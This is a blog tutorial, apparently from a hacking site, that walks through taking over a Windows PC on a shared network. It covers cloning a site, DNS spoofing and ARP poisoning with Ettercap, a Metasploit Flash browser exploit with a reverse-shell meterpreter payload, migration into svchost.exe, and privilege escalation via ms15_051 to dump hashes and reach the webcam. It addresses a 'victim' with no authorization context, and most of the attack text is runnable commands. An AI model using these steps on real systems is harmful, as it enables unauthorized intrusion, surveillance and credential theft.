How To Hack Windows And Get Admin Access Using Metasploit
Windows Hacking

How To Hack Windows And Get Admin Access Using Metasploit ? : Step-By-Step Guide

Hellow world!
today we’ll hack windows get admin access…
we’ll use here adobe flash player vulnerability exploit of metasploit. It’s easy and working to get steady meterpreter session
Let’s go…

Required Hack-Tools for hack windows get admin access :

1. Linux with metasploit
2. adobe flash player exploit module
3.apache server and ettercap for ARP spoofing

Attack scenario:
First you’ve to be in the network of your victim.. it may be LAN or WLAN
create any website that you’re victim will be using..you can clone the website by using SET Social engineering toolkit.
How to clone website using SET
After getting cloned website you should place it in the location where your apache server root location.
i.e /var/www/html/ at this location.
Edit the HTML file place a iframe in it..

type your local IP address you can get it by typing ifconfig on new terminal(bash).
then save the file to /var/www/html/ location and  rename it to index.html

Start Attack :
To start attack you should make your victim to come to your page .
to do that you have to perform DNS Spoofing and ARP poisoning. so open up Ettercap  you can open graphical as well as terminal .
after starting ettercap go to new terminal open up file etter.dns
to find that type leafpad /etc/etter/dns/etter.dns
open that file go to DNS edit the file place your IP address into that and use * so that all the requests done by DNS resolver will be re directed to our website which is placed in our apache server.

So you’re ready to go on metasploit
service apache2 start && service postgresql start && msfconsloe

after metasploit started find an exploit named
exploit/windows/browser/adobe_flash_worker_byte_array_uaf
which was released on 02-02-2015.
search it in msfconsloe
search exploit/windows/browser/adobe_flash_worker_byte_array_uaf
if you don’t get please download the exploit from here.
download the exploit from here., then copy it in the ~/.msf4/modules/exploit/browser directory. Any exploit put here will be detected my Metasploit when it starts.
then rename the file to adobe_flash_worker_byte_array_uaf.rb

after that use that exploit .
to use that on msfconsloe type
use exploit/windows/browser/adobe_flash_worker_byte_array_uaf
the location should be same as the file which you have saved earlier.
then set your reverse tcp windows meterpreter shell
set payload windows/meterpreter/reverse_tcp
in this meterpreter session we’ll migrate the user to any specified program before execuition of exploit.
to do that type
show advanced
there you’ll find an option setting called PrependMigrate and PrependMigrateProc you’ll find the current settings of that is in False select that copy that you should make it true and there you have to specify the migration program. to do that


set prependmigrate true
set prependmigrateproc svchost.exe

now all 2 are set and migration location also specified
what will happen in this 2 lines is when we get meterpreter session open the exploit will leave the connection which has came from iframe which has done earlier and gets migrated to svchost.exe which is a windows processor it will on running all the time in windows.
then set URI path and LHOST & LPORT
set URIPATH /
set LHOST your_Ip_address
set LPORT 8084

After this done type exploit.
now it will listen on the port which you’ve specified in html file iframe and as soon it gets you’ll get meterpreter session of windows.
But you must make the user to come to your site to do that you must ARP poision and DNS spoof them because unless you force the user to come on your location they’ll never come.
to do that


go to terminal type
ettercap -G
So now we’ve started with the attack.
start sniffing by pressing unified sniffing over that menu bar and select your interface Wlan0 or Eth0 what you’re in and then go to scan host list get your victims IP address add him to target 2 then add the gateway IP address to target 2 it might be like 192.168.1.1 if you’re victims IP address is 192.168.1.125 like that.
Select menu item MITM select ARP Poisoning. Tick all the 2 options on that
i.e one way poison and sniff remote connection.
Then go to manage plug in there you select dns spoof.
after dns spoof started wait for your victim to come in.
as soon he try to enter any of the sites he/she will be redirected to our web location.
As the connections are made up you’ll get a meterpreter session and the meterpreter session will be migrated to the svchost.exe application running on your victims windows machine as well.
as you can see the meterpreter session 1 opend on your prompt you have to stop or close the ettercap immediately! because our victim will close the browser because all of his requests are poisoned.
as you closed the ettercap he can go to other sites he might close the browser. but we’ve our meterpreter session.


So now type sessions in meterpreter shell so you can see active sessions.
session -i 1
to select the session and type ps to see all the services running on our victims PC
now you can see that our session has been compromised to
(i) internet browser
(ii) svchost.exe
so as you can see we are getting all the connections that are made by the victim but we’re not having administrator previlages to admnister over his system.

hack windows get admin access

To get windows admin access you have to get any other exploits of windows to do that press CTRL+Z on your keyboard now you’ll get a prompt! asking background session hit y to that and you’ll fall back to msfconsloe but your session will be live on background.
get an module named post/multi/recon/local_exploit_suggester
use post/multi/recon/local_exploit_suggester
this is a module of the metasploit this requires a session.
to give that type set session 1
so the session is set then you type exploit.
now you’ll get the vulnerable exploits of the system. you can use it one by one.
we will be using this exploit here
exploit/windows/local/ms15_051_clien_copy_image
this is a stable exploit that is used to  get windows admin access.
to use that type
use exploit/windows/local/ms15_051_client_copy_image
this exploit requires a session and this works on X86 based windows.
to set that type set session 1 then hit exploit
as you get your second meterpreter session opend you can enjoy administrator access.
type getuid to check your administrator access. and hit getsystem to get all the administrative previlages. now you can watch everything on the computer.
you can open files get hashdump webcam etc..
if you don’t know how to use all just type help and see all the options.
so now you’ve got all the admin powers.

I hope this tutorial is helpful to understand how to hack windows get admin access. if you’ve any queries comment. keep hacking! keep visiting 🙂 thank you..

The following two tabs change content below.

Anuj Mishra

Admin, Founder & Chief Editor at HackeRoyale
Engineer. Blogger. Ethical hacker. Penetration Tester. Deep Webbie. Bug hunter. Security Analyst. Web Developer. Techie. Programmer. Foodie. Music Lover. Traveller. Enthusiast.

Comment Now !